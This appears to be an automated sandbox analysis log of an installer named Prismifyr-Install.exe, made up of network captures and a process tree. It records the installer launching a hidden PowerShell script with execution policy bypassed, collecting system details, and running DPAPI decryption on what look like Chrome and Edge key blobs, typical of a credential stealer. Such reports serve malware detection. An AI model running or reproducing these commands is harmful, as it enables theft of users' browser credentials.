                                                                                                                                                                                                                                    Oct 1, 2024 18:22:12.238804102 CEST77OUTGET / HTTP/1.1
                                                                                                                                                                                                                                    Host: api.ipify.org
                                                                                                                                                                                                                                    User-Agent: curl/7.55.1
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:12.425390005 CEST231INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Tue, 01 Oct 2024 16:22:12 GMT
                                                                                                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                                                                                                    Content-Length: 15
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 8cbdca46eed74c21-MIA
                                                                                                                                                                                                                                    Data Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 33
                                                                                                                                                                                                                                    Data Ascii: 102.129.152.223


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    1192.168.11.2049767172.67.74.152808032C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 1, 2024 18:23:12.933733940 CEST77OUTGET / HTTP/1.1
                                                                                                                                                                                                                                    Host: api.ipify.org
                                                                                                                                                                                                                                    User-Agent: curl/7.55.1
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Oct 1, 2024 18:23:13.112426996 CEST231INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Tue, 01 Oct 2024 16:23:13 GMT
                                                                                                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                                                                                                    Content-Length: 15
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 8cbdcbc2390c7494-MIA
                                                                                                                                                                                                                                    Data Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 33
                                                                                                                                                                                                                                    Data Ascii: 102.129.152.223


                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                    Start time:12:22:04
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\Prismifyr-Install.exe"
                                                                                                                                                                                                                                    Imagebase:0x7ff7e2820000
                                                                                                                                                                                                                                    File size:63'862'037 bytes
                                                                                                                                                                                                                                    MD5 hash:96D6158A2EA98333A66B0505DFB4A95A
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                                                    Start time:12:22:04
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7f31f0000
                                                                                                                                                                                                                                    File size:875'008 bytes
                                                                                                                                                                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                                    Start time:12:22:06
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\8XTZx.ps1""
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                                    Start time:12:22:07
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\8XTZx.ps1"
                                                                                                                                                                                                                                    Imagebase:0x7ff7e5e00000
                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                                    Start time:12:22:07
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1d1qdkxo\1d1qdkxo.cmdline"
                                                                                                                                                                                                                                    Imagebase:0x7ff6778f0000
                                                                                                                                                                                                                                    File size:2'759'232 bytes
                                                                                                                                                                                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                                    Start time:12:22:07
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5D70.tmp" "c:\Users\user\AppData\Local\Temp\1d1qdkxo\CSC52BD52076B74273B09B644FAD90AB4F.TMP"
                                                                                                                                                                                                                                    Imagebase:0x7ff74f780000
                                                                                                                                                                                                                                    File size:52'744 bytes
                                                                                                                                                                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                                    Start time:12:22:10
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                                    Start time:12:22:10
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:curl http://api.ipify.org/ --ssl-no-revoke
                                                                                                                                                                                                                                    Imagebase:0x7ff730760000
                                                                                                                                                                                                                                    File size:421'376 bytes
                                                                                                                                                                                                                                    MD5 hash:1C3645EBDDBE2DA6A32A5F9FB43A3C23
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                                                    Start time:12:22:11
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                                                    Start time:12:22:11
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:wmic bios get smbiosbiosversion
                                                                                                                                                                                                                                    Imagebase:0x7ff6edd80000
                                                                                                                                                                                                                                    File size:526'848 bytes
                                                                                                                                                                                                                                    MD5 hash:A2EF3F0AD95FDA9262A5F9533B6DD1BD
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                                                    Start time:12:22:12
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                                                                    Start time:12:22:12
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:wmic MemoryChip get /format:list
                                                                                                                                                                                                                                    Imagebase:0x7ff6edd80000
                                                                                                                                                                                                                                    File size:526'848 bytes
                                                                                                                                                                                                                                    MD5 hash:A2EF3F0AD95FDA9262A5F9533B6DD1BD
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                                                                    Start time:12:22:12
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:find /i "Speed"
                                                                                                                                                                                                                                    Imagebase:0x7ff692ee0000
                                                                                                                                                                                                                                    File size:17'920 bytes
                                                                                                                                                                                                                                    MD5 hash:AE3F3DC3ED900F2A582BAD86A764508C
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                                                    Start time:12:22:13
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                                                                    Start time:12:22:13
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                    Imagebase:0x7ff6edd80000
                                                                                                                                                                                                                                    File size:526'848 bytes
                                                                                                                                                                                                                                    MD5 hash:A2EF3F0AD95FDA9262A5F9533B6DD1BD
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:16
                                                                                                                                                                                                                                    Start time:12:22:13
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                                                                    Start time:12:22:13
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:powershell.exe Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
                                                                                                                                                                                                                                    Imagebase:0x7ff7e5e00000
                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                                                                    Start time:12:22:14
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist /fo csv"
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:19
                                                                                                                                                                                                                                    Start time:12:22:14
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:tasklist /fo csv
                                                                                                                                                                                                                                    Imagebase:0x7ff7bf340000
                                                                                                                                                                                                                                    File size:106'496 bytes
                                                                                                                                                                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                                                                    Start time:12:22:15
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell.exe "Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty SerialNumber""
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                                                                    Start time:12:22:15
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:powershell.exe "Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty SerialNumber"
                                                                                                                                                                                                                                    Imagebase:0x7ff7e5e00000
                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:22
                                                                                                                                                                                                                                    Start time:12:22:18
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:23
                                                                                                                                                                                                                                    Start time:12:22:18
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:tasklist
                                                                                                                                                                                                                                    Imagebase:0x7ff7bf340000
                                                                                                                                                                                                                                    File size:106'496 bytes
                                                                                                                                                                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:24
                                                                                                                                                                                                                                    Start time:12:22:21
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,58,191,23,156,155,190,129,64,149,138,58,204,106,21,93,128,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,158,216,160,155,71,150,161,140,235,194,244,159,203,38,103,42,177,143,229,191,164,155,210,123,234,21,195,11,224,12,237,78,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,215,49,197,181,72,227,196,181,37,169,138,139,47,57,31,78,97,239,161,240,18,47,110,119,132,178,134,149,164,43,5,48,0,0,0,146,52,103,242,198,28,44,32,12,252,157,63,10,75,202,239,143,18,205,151,232,185,211,51,232,89,122,202,158,188,117,227,76,233,202,45,129,32,140,198,215,239,226,206,172,246,221,60,64,0,0,0,153,187,114,159,254,24,39,207,127,235,243,169,142,141,246,185,182,44,170,244,196,65,82,59,16,103,98,92,97,151,28,253,101,220,115,212,47,120,18,125,156,32,17,123,177,29,8,158,250,170,174,124,95,6,8,229,11,233,4,171,209,80,70,116), $null, 'CurrentUser')"
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:25
                                                                                                                                                                                                                                    Start time:12:22:21
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,58,191,23,156,155,190,129,64,149,138,58,204,106,21,93,128,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,158,216,160,155,71,150,161,140,235,194,244,159,203,38,103,42,177,143,229,191,164,155,210,123,234,21,195,11,224,12,237,78,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,215,49,197,181,72,227,196,181,37,169,138,139,47,57,31,78,97,239,161,240,18,47,110,119,132,178,134,149,164,43,5,48,0,0,0,146,52,103,242,198,28,44,32,12,252,157,63,10,75,202,239,143,18,205,151,232,185,211,51,232,89,122,202,158,188,117,227,76,233,202,45,129,32,140,198,215,239,226,206,172,246,221,60,64,0,0,0,153,187,114,159,254,24,39,207,127,235,243,169,142,141,246,185,182,44,170,244,196,65,82,59,16,103,98,92,97,151,28,253,101,220,115,212,47,120,18,125,156,32,17,123,177,29,8,158,250,170,174,124,95,6,8,229,11,233,4,171,209,80,70,116), $null, 'CurrentUser')
                                                                                                                                                                                                                                    Imagebase:0x7ff7e5e00000
                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:26
                                                                                                                                                                                                                                    Start time:12:22:27
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser')"
                                                                                                                                                                                                                                    Imagebase:0x7ff785880000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:27
                                                                                                                                                                                                                                    Start time:12:22:27
                                                                                                                                                                                                                                    Start date:01/10/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser')
                                                                                                                                                                                                                                    Imagebase:0x7ff7e5e00000
                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                    Has elevated privileges:true
